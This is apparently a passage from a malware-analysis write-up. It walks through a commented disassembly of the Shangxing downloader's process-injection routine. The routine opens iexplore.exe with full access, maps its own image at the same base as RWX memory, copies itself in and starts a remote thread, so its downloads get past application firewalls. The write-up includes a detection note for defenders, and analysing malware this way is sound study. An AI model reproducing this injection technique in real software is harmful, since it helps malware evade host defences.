13143976 |. 8B45 FC mov eax,dword ptr ss:[ebp-4] ; pid of the IE window's process
13143979 |. 50 push eax ; /ProcessId
1314397A |. 6A 00 push 0 ; |Inheritable = FALSE
1314397C |. 68 FF0F1F00 push 1F0FFF ; |Access = PROCESS_ALL_ACCESS
13143981 |. E8 2EFBFFFF call <jmp.&kernel32.OpenProcess> ; \OpenProcess
13143986 |. 8BD8 mov ebx,eax ; ebx = hProcess (NULL not checked)
13143988 |. BA 20381413 mov edx,Down.13143820 ; edx = routine to run inside IE
1314398D |. 8BC3 mov eax,ebx
1314398F |. E8 9CFCFFFF call Down.13143630 ; inject this image into IE and start edx there
{
13143630 /$ 53 push ebx ; inject(eax = hProcess, edx = remote start address): copy this whole image into the target at its own base and run edx there
13143631 |. 56 push esi
13143632 |. 57 push edi
13143633 |. 55 push ebp
13143634 |. 83C4 F8 add esp,-8 ; two dword outputs: [esp] bytes written, [esp+4] thread id
13143637 |. 8BEA mov ebp,edx ; ebp = remote thread start address
13143639 |. 8BF0 mov esi,eax ; esi = hProcess
1314363B |. 6A 00 push 0 ; /pModule = NULL
1314363D |. E8 5AFEFFFF call <jmp.&kernel32.GetModuleHandleA> ; \GetModuleHandleA -> own image base
GetModuleHandleA(NULL) returns the dropper's own image base. The next five instructions walk the PE header — e_lfanew at [ebx+3C], +4 to the file header, +0x14 to the optional header — and load SizeOfImage (optional-header offset 0x38) into edi.
13143642 |. 8BD8 mov ebx,eax ; ebx = own image base
13143644 |. 8B43 3C mov eax,dword ptr ds:[ebx+3C] ; e_lfanew
13143647 |. 03C3 add eax,ebx ; -> IMAGE_NT_HEADERS
13143649 |. 83C0 04 add eax,4 ; -> FileHeader
1314364C |. 83C0 14 add eax,14 ; -> OptionalHeader
1314364F |. 8B78 38 mov edi,dword ptr ds:[eax+38] ; edi = OptionalHeader.SizeOfImage
13143652 |. 68 00800000 push 8000 ; /FreeType = MEM_RELEASE
13143657 |. 6A 00 push 0 ; |Size = 0
13143659 |. 53 push ebx ; |Address = own image base
1314365A |. 56 push esi ; |hProcess
1314365B |. E8 6CFEFFFF call <jmp.&kernel32.VirtualFreeEx> ; free whatever occupies that address range in the target
13143660 |. 6A 40 push 40 ; /Protect = PAGE_EXECUTE_READWRITE
13143662 |. 68 00300000 push 3000 ; |AllocationType = MEM_COMMIT|MEM_RESERVE
13143667 |. 57 push edi ; |Size = SizeOfImage
13143668 |. 53 push ebx ; |Address = own image base (same address -> the copy needs no relocation)
13143669 |. 56 push esi ; |hProcess
1314366A |. E8 55FEFFFF call <jmp.&kernel32.VirtualAllocEx> ; eax = remote base; NULL not checked
First VirtualFreeEx(hIE, ownBase, 0, MEM_RELEASE) releases whatever is mapped at the dropper's own image base inside IE; then VirtualAllocEx(hIE, ownBase, SizeOfImage, MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE) allocates exactly that range there. Asking for its own base means the copied image needs no relocation fix-ups — which is presumably why the dropper was linked at such an unusual base. The allocation result is not checked.
1314366F |. 54 push esp ; /pBytesWritten -> local
13143670 |. 57 push edi ; |BytesToWrite = SizeOfImage
13143671 |. 53 push ebx ; |Buffer = own mapped image
13143672 |. 50 push eax ; |Address = remote base returned by VirtualAllocEx
13143673 |. 56 push esi ; |hProcess
13143674 |. E8 63FEFFFF call <jmp.&kernel32.WriteProcessMemory> ; \WriteProcessMemory -- copies the entire image; result not checked
WriteProcessMemory copies the dropper's entire mapped image (SizeOfImage bytes starting at its own base) into IE at the same address. The VirtualAllocEx result in eax is used as the destination without a NULL check.
13143679 |. 8D4424 04 lea eax,dword ptr ss:[esp+4]
1314367D |. 50 push eax ; /pThreadId -> local
1314367E |. 6A 00 push 0 ; |CreationFlags = 0 (run immediately)
13143680 |. 53 push ebx ; |pParameter = image base
13143681 |. 55 push ebp ; |StartAddress = edx argument (13143820 from the caller)
13143682 |. 6A 00 push 0 ; |StackSize = 0
13143684 |. 6A 00 push 0 ; |pThreadAttributes = NULL
13143686 |. 56 push esi ; |hProcess
13143687 |. E8 00FEFFFF call <jmp.&kernel32.CreateRemoteThread> ; \CreateRemoteThread -- the download now runs inside iexplore.exe; thread handle returned in eax and never closed
CreateRemoteThread(hIE, NULL, 0, 13143820, ownBase, 0, &tid) starts a thread inside IE at the routine passed in edx (13143820), with the image base as its parameter. From here on the download runs inside iexplore.exe, so an application-level firewall sees the trusted browser making the connection.
1314368C |. 59 pop ecx ; discard the two dword locals
1314368D |. 5A pop edx
1314368E |. 5D pop ebp
1314368F |. 5F pop edi
13143690 |. 5E pop esi
13143691 |. 5B pop ebx
13143692 \. C3 retn ; eax = CreateRemoteThread result
}
13143994 |. 53 push ebx ; /hObject = hProcess
13143995 |. E8 EAFAFFFF call <jmp.&kernel32.CloseHandle> ; \CloseHandle
1314399A |. 33C0 xor eax,eax
1314399C |. 5A pop edx
1314399D |. 59 pop ecx
1314399E |. 59 pop ecx
1314399F |. 64:8910 mov dword ptr fs:[eax],edx ; restore the previous SEH frame
131439A2 |. 68 B7391413 push Down.131439B7 ; finally block: continuation address after cleanup
131439A7 |> 8D45 F8 lea eax,dword ptr ss:[ebp-8]
131439AA |. E8 DDF5FFFF call Down.13142F8C ; free the IE path string
131439AF \. C3 retn
}
— so the Shangxing (上兴) downloader gets through the firewall by injecting itself into the IE process. (For defenders: OpenProcess(PROCESS_ALL_ACCESS) → VirtualAllocEx(RWX) → WriteProcessMemory → CreateRemoteThread against iexplore.exe is exactly the sequence host-based detection keys on.) The code below is identical for each slot: every URL you filled in gets its own WinExec/inject round and therefore its own remote thread.
13143A6E > 8D85 F0FEFFFF lea eax,dword ptr ss:[ebp-110] ; slot 2: same check-and-inject sequence as slot 1
13143A74 . 8B15 A4401413 mov edx,dword ptr ds:[131440A4] ; second URL you filled in
13143A7A . E8 49ECFFFF call Down.131426C8 ; copy into the local ShortString
13143A7F . 8D85 F0FEFFFF lea eax,dword ptr ss:[ebp-110]
13143A85 . BA 503B1413 mov edx,Down.13143B50 ; same constant as for slot 1
13143A8A . 33C9 xor ecx,ecx
13143A8C . 8A08 mov cl,byte ptr ds:[eax]
13143A8E . 41 inc ecx
13143A8F . E8 F0EAFFFF call Down.13142584 ; compare
13143A94 . 74 0F je short Down.13143AA5 ; unfilled -> skip
13143A96 . A1 A4401413 mov eax,dword ptr ds:[131440A4]
13143A9B . A3 78561413 mov dword ptr ds:[13145678],eax ; publish URL in the shared global
13143AA0 . E8 7FFEFFFF call Down.13143924 ; launch IE + inject
13143AA5 > 8D85 F0FEFFFF lea eax,dword ptr ss:[ebp-110] ; slot 3
13143AAB . 8B15 A8401413 mov edx,dword ptr ds:[131440A8] ; Down.13143754
13143AB1 . E8 12ECFFFF call Down.131426C8
13143AB6 . 8D85 F0FEFFFF lea eax,dword ptr ss:[ebp-110]
13143ABC . BA 503B1413 mov edx,Down.13143B50
13143AC1 . 33C9 xor ecx,ecx
13143AC3 . 8A08 mov cl,byte ptr ds:[eax]
13143AC5 . 41 inc ecx
13143AC6 . E8 B9EAFFFF call Down.13142584
13143ACB . 74 0F je short Down.13143ADC
13143ACD . A1 A8401413 mov eax,dword ptr ds:[131440A8]
13143AD2 . A3 78561413 mov dword ptr ds:[13145678],eax
13143AD7 . E8 48FEFFFF call Down.13143924
13143ADC > 8D85 F0FEFFFF lea eax,dword ptr ss:[ebp-110] ; slot 4
13143AE2 . 8B15 AC401413 mov edx,dword ptr ds:[131440AC] ; Down.13143798
13143AE8 . E8 DBEBFFFF call Down.131426C8
13143AED . 8D85 F0FEFFFF lea eax,dword ptr ss:[ebp-110]
13143AF3 . BA 503B1413 mov edx,Down.13143B50
13143AF8 . 33C9 xor ecx,ecx
13143AFA . 8A08 mov cl,byte ptr ds:[eax]
13143AFC . 41 inc ecx
13143AFD . E8 82EAFFFF call Down.13142584
13143B02 . 74 0F je short Down.13143B13
13143B04 . A1 AC401413 mov eax,dword ptr ds:[131440AC]
13143B09 . A3 78561413 mov dword ptr ds:[13145678],eax
13143B0E . E8 11FEFFFF call Down.13143924
13143B13 > 8D85 F0FEFFFF lea eax,dword ptr ss:[ebp-110] ; slot 5
13143B19 . 8B15 B0401413 mov edx,dword ptr ds:[131440B0] ; Down.131437DC
13143B1F . E8 A4EBFFFF call Down.131426C8
13143B24 . 8D85 F0FEFFFF lea eax,dword ptr ss:[ebp-110]
13143B2A . BA 503B1413 mov edx,Down.13143B50
13143B2F . 33C9 xor ecx,ecx
13143B31 . 8A08 mov cl,byte ptr ds:[eax]
13143B33 . 41 inc ecx
13143B34 . E8 4BEAFFFF call Down.13142584
13143B39 . 74 0F je short Down.13143B4A
13143B3B . A1 B0401413 mov eax,dword ptr ds:[131440B0]
13143B40 . A3 78561413 mov dword ptr ds:[13145678],eax
13143B45 . E8 DAFDFFFF call Down.13143924
13143B4A > E8 4DF3FFFF call Down.13142E9C ; presumably the runtime's exit; the routine continues past this listing
The analysis went quickly, and I learned a few things along the way — how to write a configuration/builder program, how to give your own program a compression option, and so on. But my programming is really poor: VB keeps producing bugs, and after several days of writing it in assembly
there are still bugs. What a headache...